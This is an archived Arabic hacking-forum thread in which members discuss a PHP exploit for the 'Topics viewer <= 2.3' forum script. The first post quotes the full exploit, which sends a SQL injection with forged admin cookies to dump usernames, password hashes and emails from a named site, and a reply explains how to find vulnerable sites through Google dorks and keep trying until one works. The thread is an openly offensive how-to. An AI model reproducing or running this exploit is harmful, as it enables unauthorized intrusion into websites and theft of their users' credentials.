:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)
-   -   [استفسار] حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection (http://www.vbspiders.com/vb/t63194.html)

Abo MalaK 07-05-2012 09:12 AM

حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
 
السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3

فهمت تقريبآ 60%

اقتباس:

<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo "<br> [-]---------------------------------------------[-]<br>";

$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print "<br> <b>[$i] ".trim($ayrik)."</b><br>";

$i++;

}

echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";

}

?>
طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?

+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم


mido868 07-05-2012 07:00 PM

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
 
اقتباس:

المشاركة الأصلية كتبت بواسطة Abo MalaK (المشاركة 440895)
السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3

فهمت تقريبآ 60%


طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?

+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم


اكيد اخى العزيز الموقع ينتهى مثل هذا
.php?id=

ثانيا الاسكربت المصاب الذى ستبحث عنه
/modcp/rmv_topic_pop.php?

ويمكنك ان تقوم بعمل التالى
inurl:
ثم تضع بعدها اسم الاسكربت المصاب فى محرك البحث جوجل ثم تبدأ بالاختبار على عدة مواقع
وملحوظة لا تيأس اذا وجدت عديد من المواقع تم ترقيع الثغرة منها واستمر فى المحاولة وتذكر دائما ان الصبر احد الاركان الاساسية للنجاح

Abo MalaK 07-06-2012 03:48 AM

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
 
شآكر لتفاعلك ،

بس الدوركت مستحيل يكون

/modcp/rmv_topic_pop.php?

لآن ماطلع ولا موقع،

بعدين الاستغلال هل احفظ الثغره بصيغة html واستغل؟

Abo MalaK 07-07-2012 12:45 AM

رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection
 
الآستغلال لحد الآن ماوصلت له،

هل اعدل على كود الثغره ام انفذ امر
php rmv_topic_pop.php site.com/path/

؟


الساعة الآن 12:09 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0